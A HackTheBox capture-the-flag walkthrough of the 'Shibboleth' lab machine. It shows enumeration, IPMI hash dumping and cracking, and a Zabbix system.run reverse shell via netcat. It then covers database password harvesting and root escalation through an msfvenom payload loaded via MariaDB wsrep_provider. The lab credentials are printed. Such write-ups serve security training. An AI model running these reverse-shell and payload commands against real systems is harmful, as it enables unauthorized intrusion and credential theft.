Hack_The_Box_Writeups

HackTheBox – Shibboleth Walkthrough – In English

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.124

┌──(rootkali)-[/home/kali/Downloads]

└─# cat /etc/hosts | grep 10.10.11.124

┌──(rootkali)-[/home/kali/Downloads]

└─# ffuf -u http://shibboleth.htb/FUZZ -t 100 -sf -e php,txt,html,js -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -ic -c

┌──(rootkali)-[/home/kali/Downloads]

└─# ffuf -u http://shibboleth.htb/ -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 -H “Host:FUZZ.shibboleth.htb” –fc 302

┌──(rootkali)-[/home/kali/Downloads]

└─# echo “10.10.11.124 monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb” | sudo tee -a /etc/host

http://zabbix.shibboleth.htb/

This was Zabbix Login Page. A quick google search told that the default credential was Admin:zabbix.

But this credential is not working.

Finally, spending a lot of time on port 80 I started a UDP scan which gives me one open port i.e 623.

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -sU -sC -sV shibboleth.htb -T4

It looks like port 623/UDP is an IPMI port used for embedded device management. I’ve never heard of it before so I look for exploits!

msf6 > use auxiliary/scanner/ipmi/ipmi_cipher_zero

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > show options

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHoSTS 10.10.11.124

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run

msf6 > use auxiliary/scanner/ipmi/ipmi_version

msf6 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 10.10.11.124

msf6 auxiliary(scanner/ipmi/ipmi_version) > exploit

msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

Hash:

Administrator:02fb08888201000033e2f01b8b8b8d0b1616ff5ea39d8db4c975925effd3d2a2eeb9b3cf483e1f91a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:440767ae6339a2523a033995b3fe41128cb0321b

┌──(rootkali)-[/home/kali/Downloads]

└─# hashcat -m 7300 hash.txt /home/kali/Downloads/rockyou.txt   

Username: Administrator

Password : ilovepumkinpie1

Navigate to Configuration → Hosts you will see the host mentioned. Now hosts have different types of tags like triggers, items, web, etc. We are interested in items tag.

Click on items → click on “Create items

Key: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.102 1234 >/tmp/f,nowait]

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -nlvp 1234

Now start an NC listener and click on the “test” button →“get value” and we have a shell.

$ cat /etc/passwd

$ cd /home

$ ls

$ cd ipmi-svc

$ ls

$ cat user.txt

$ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

zabbix@shibboleth:/home/ipmi-svc$ su ipmi-svc

ipmi-svc@shibboleth:/etc/zabbix$ netstat –antp

Once we have access to the user flag and the user account, I see that MySQL is running, and start grepping for passwords. I find it in the /etc/zabbix directory. 

ipmi-svc@shibboleth:~$ grep -iR ‘password’ /etc/zabbix/ 2>/dev/null

DBPassword=bloooarskybluh

ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -p -D zabbix

Enter password: bloooarskybluh

┌──(rootkali)-[/home/kali/Downloads]

└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.102 LPORT=4001 -f elf-so -o test.so

┌──(rootkali)-[/home/kali/Downloads]

└─# python -m http.server 80

MariaDB [zabbix]> quit

ipmi-svc@shibboleth:/etc/zabbix$ cd /tmp

ipmi-svc@shibboleth:/tmp$ wget http://10.10.14.102/test.so

ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -p -D zabbix

Enter password: bloooarskybluh

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 4001

MariaDB [zabbix]> SET GLOBAL wsrep_provider=”/tmp/test.so”;

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *